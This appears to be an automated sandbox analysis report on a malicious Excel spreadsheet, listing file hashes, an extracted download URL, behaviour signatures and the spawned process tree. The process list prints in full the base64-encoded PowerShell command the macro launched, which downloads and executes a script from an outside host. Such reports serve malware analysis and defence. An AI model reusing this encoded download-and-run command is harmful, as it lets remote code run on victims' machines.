Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 13:03
Behavioral task
behavioral1
Sample
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
Resource
win10v2004-20240802-en
General
-
Target
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
-
Size
28KB
-
MD5
14399d9b212ebf920943652ba1e7f5e3
-
SHA1
2411de8a3f816645015e912bd92e5369c6e5b0c9
-
SHA256
4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7
-
SHA512
72f667df460361c44e51558fc09b035569bc570567ac732c25c5996f3e844170acf2d42439964993aeae04c41b7218226c5e989a7b9d78eacaf11b4a8b3f0c7b
-
SSDEEP
384:i8LD/TZxA6ymevz2NsdHLpeAokr25Uen/WWA/E:rD/N+6devz2NsdHLQkr25U6We
Malware Config
Extracted
https://oshi.at/LdxX
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2180 2640 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2180 powershell.exe -
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule behavioral1/files/0x0007000000018705-18.dat office_macro_on_action -
Deletes itself 1 IoCs
pid Process 2640 EXCEL.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\16577F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2640 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2180 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2640 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2180 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2640 EXCEL.EXE 2640 EXCEL.EXE 2640 EXCEL.EXE 2640 EXCEL.EXE 2640 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2180 2640 EXCEL.EXE 30 PID 2640 wrote to memory of 2180 2640 EXCEL.EXE 30 PID 2640 wrote to memory of 2180 2640 EXCEL.EXE 30 PID 2640 wrote to memory of 2180 2640 EXCEL.EXE 30
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls1⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBvAHMAaABpAC4AYQB0AC8ATABkAHgAWAAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4b42cea522e48b27e21a52991f010848e0a5c6e0e42255b7a5323afb81b03dd7.xls
Filesize68KB
MD5f0dbcd4af1775996e48182125ffd6584
SHA1d31ea4907103808ef8e80291a5cc5280ee3228b7
SHA25601bf932002ed3a78abcefcb02585159197e7fbaa3ad4c8de032eb18d83265b40
SHA512af59ce11d253f2a871506e14285a79432d3adcdaac3da1db4758a6e6dde24905f7d7d11c91b519c456e9f1f44dc4c8d94d4dd2bacc93eff0fa790e770f77787f